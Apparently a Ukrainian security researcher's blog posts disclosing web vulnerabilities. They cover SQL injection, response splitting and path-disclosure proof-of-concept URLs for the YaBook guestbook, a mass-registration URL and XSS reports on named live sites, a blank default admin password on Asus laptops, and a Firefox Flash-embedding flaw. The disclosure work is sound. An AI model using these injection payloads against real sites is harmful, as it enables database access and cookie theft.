Websecurity - Веб безпека

21.01.2009

В лютому, 17.02.2008, я знайшов SQL Injection, Redirector, HTTP Response Splitting та Information Leakage уразливості, а сьогодні ще й Full path disclosure в YaBook. Це гостьова книга. Дірки виявив на сайті розробника YaBook. Про що найближчим часом повідомлю розробнику веб додатку.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробнику додатку.

16.05.2009

SQL Injection:

http://site/guestbook/index.php?action=jump&id=-1%20union%20select%20version()

Redirector (через SQL Injection):

http://site/guestbook/index.php?action=jump&id=-1%20union%20select%20'http://websecurity.com.ua'

HTTP Response Splitting (через SQL Injection):

http://site/guestbook/index.php?action=jump&id=-1%20union%20select%20'%0AContent-Type:html%0A%0A%3Cscript%3Ealert(document.cookie)%3C/script%3E'

Працює на старих версіях PHP.

Information Leakage:

http://site/guestbook/index.php

В meta-тегах виводиться інформація про версію PHP, MySQL і веб сервера.

Full path disclosure:

http://site/guestbook/config.inc.php

Full path disclosure (через SQL Injection):

http://site/guestbook/index.php?action=jump&id=-1%20union%20select%20'%0A1'

Уразлива версія YaBook 0.98.1-alpha та попередні версії.

В версії YaBook 0.98.2-alpha автор виправив дані уразливості.

У липні, 19.07.2008, я знайшов Insufficient Anti-automation та Cross-Site Scripting уразливості на сайті http://www.s-cars.org. Про що найближчим часом сповіщу адміністрацію сайта. Дані уразливості в PostNuke Phoenix, про які я писав раніше.

Insufficient Anti-automation:

http://www.s-cars.org/postnuke/user.php?uname=test&pass=12345&vpass=12345&email=test@test.com&vemail=test@test.com&agreetoterms=1&module=NS-NewUser&op=finishnewuser

XSS:

• alert(document.cookie)
• цікавий

На сайті використовується WAF, який я легко обійшов. За допомогою self-contained XSS.

В даній добірці уразливості в веб додатках:

• BlackBook v1.0 Multiple XSS Vulnerabilities (деталі)
• vlBook 1.21 (ALL VERSION) Multiple Remote Vulnerabilities (LFI/XSS) (деталі)
• mjguest 6.7 (ALL VERSION) Xss & Redirection Vuln (деталі)
• php-addressbook v2.0 Multiple Remote Vulnerabilities (LFI/XSS) (деталі)
• SiteXS CMS Remote File Upload Vulnerability (деталі)
• Fixed: LiveCart SQL injection vulnerability fixed since version 1.1.2 (деталі)
• Mozilla Foundation Security Advisory 2007-32 (деталі)
• Mozilla Foundation Security Advisory 2007-33 (деталі)
• Mozilla Foundation Security Advisory 2007-34 (деталі)
• Mozilla Foundation Security Advisory 2007-35 (деталі)

У серпні, 20.08.2008, я знайшов SQL Injection, Denial of Service та Full path disclosure уразливості на сайті http://dalas.com.ua. Про що найближчим часом сповіщу адміністрацію сайта.

Детальна інформація про уразливості з’явиться пізніше.

17.01.2009

У березні, 08.03.2008, я знайшов Cross-Site Scripting уразливість на проекті http://revver.com (відео хостінг). Про що найближчим часом сповіщу адміністрацію проекта.

Останній раз стосовно сервісів відео хостінгу я писав про уразливості на www.metacafe.com.

Детальна інформація про уразливість з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

14.05.2009

XSS:

• alert(document.cookie)
• цікавий

Дану уразливість досі не виправели.

Після публікації інформації про Insufficient Authentication уразливість в ноутбуках Acer, я вирішив дослідити всі ноутбуки моїх друзів. Зокрема я перевірив два ноутбуки Asus: на одному з Windows XP Professional даної уразливості немає, а на іншому з Windows XP Home Edition є дана уразливість.

Учора, 12.05.2009, я виявив Insufficient Authentication уразливість в ноутбуці Asus. На цьому ноутбуці використовується Windows XP HE.

В Windows XP Home Edition в дефолтному акаунті адміністратора “Администратор” пустий пароль. І він не задається рівним паролю першого адміна, коли при першому запуску ноутбука створюється акаунт адміна (як це робиться при інсталяції Windows XP). Тому при фізичному доступі до ноутбука, будь-хто зможе зайти в систему з правами адміністратора.

Уразливі моделі ноутбуків: Asus А6500R та потенційно інші моделі.

Зараз продовжую досліджувати дану ситуацію. Якщо ви виявите подібну ситуацію в себе на ноутбуці чи на настольному ПК (що буде пустий пароль в дефолтному адмінському акаунті), то повідомте мені на ємайл.

В даній добірці уразливості в веб додатках:

• Denial of Service in PacketTrap TFTP server 2.0.3901.0 (деталі)
• DDIVRT-2008-09 PacketTrap PT360 Tool Suite TFTP Denial of Service Vulnerability (деталі)
• DDIVRT-2008-10 PacketTrap TFTP Directory Traversal Vulnerability (деталі)
• Zomplog 3.8.2 XSS Vulnerability (деталі)
• XSS in chicomas.2.0.4 (деталі)
• project alumni v1.0.9 (info.php) SQL Injection Vulnerability (деталі)
• Lifetype 1.2.7 XSS Vulnerability (деталі)
• Mozilla Foundation Security Advisory 2007-29 (деталі)
• Mozilla Foundation Security Advisory 2007-30 (деталі)
• Mozilla Foundation Security Advisory 2007-31 (деталі)

Про уразливості з наслідуванням в Firefox я вже писав раніше - Charset Inheritance уразливість в Mozilla Firefox 3. А зараз розповім вам про уразливість пов’язану з відсутністю наслідування .

Існує офіційна методика від Adobe для захисту від XSS атак через флеш-файли, при їх розміщенні на веб сайтах. Для цього потрібно задати параметру allowScriptAccess значення never. IE підтримує лише тег object, тому треба в ньому вказувати allowScriptAccess, а інші браузери підтримують тег embed, в якому потрібно вказати allowScriptAccess (або деякі браузери підтримують обидва теги object і embed). Тому для всіх використаних тегів для розміщення флешки потрібно задати allowScriptAccess.

Даний метод я використав в своєму виправленні XSS уразливості в Invision Power Board в MustLive Security Pack v.1.0.6.

Учора, 11.05.2009, я виявив уразливість в Mozilla Firefox, яку я назвав Properties not-inheritance уразливість. Її я виявив на сайті megaswf.com. Дана уразливість може використовуватися для проведення Cross-Site Scripting атак.

Браузер Firefox підтримує розміщення флешек як через object так і через embed тег. При цьому на вищезгаданому сайті для показу флешки в усіх браузерах використовується два вкладені теги object (перший для IE, а другий для інших браузерів). В першому тезі object заданий параметр <param name=”allowscriptaccess” value=”never”>, але він не заданий в другому тезі.

В результаті XSS код з флешки спрацьовує в Firefox, але не спрацьовує в інших браузерах. Тому що для IE вказаний захист в першому тезі object, а Opera і Google Chrome наслідують даний параметр з першого у другий вкладений тег object. Чого не робить Firefox. Тому це Properties not-inheritance уразливість в Firefox.

Уразливі Firefox 3.0.9 та 3.0.10 та попередні версії.

Сьогодні я знайшов Cross-Site Scripting уразливості на проекті http://megaswf.com (хостінг SWF файлів). Про що найближчим часом сповіщу адміністрацію проекту.

XSS:

Це persistent XSS через Flash. Атака працює в Mozilla та Firefox.

• alert(document.cookie)
• цікавий

На сторінках з закаченими флешками є код <param name=”allowScriptAccess” value=”never”> (для захисту від XSS), але він спрацює тільки в IE та інших браузерах, але не в Mozilla та Firefox. Тому в браузерах Mozilla та Firefox код виконається.

А на сторінці http://megaswf.com/recent.php зовсім немає захисного коду, тому XSS код з флешки виконається (і в усіх браузерах), якщо флешка буде в даному розділі.

XSS:

• alert(document.cookie)
• цікавий

Це reflected XSS через Flash. Атака відбувається (в усіх браузерах) при прямому запиті до swf файла.

В даній добірці уразливості в веб додатках:

• Heap overflow in Sybase MobiLink 10.0.1.3629 (деталі)
• Minibb 2.2a XSS Vulnerability (деталі)
• Local & Remote File Inclusion in chicomas 2.0.4 (деталі)
• New kronolith2 packages fix cross site scripting (деталі)
• Directory traversal and DoS in WinIPDS G52-33-021 (деталі)
• SugarCRM Community Edition Local File Disclosure Vulnerability (деталі)
• Softbiz Web Host Directory Script (search_result.php host_id) Blind Sql Injection Vulnerability (деталі)
• Prozilla Hosting Index (directory.php cat_id) Blind Sql Injection Vulnerability (деталі)
• XSS in AstroCam (деталі)
• XSS Attack in sitexs 0.1 (деталі)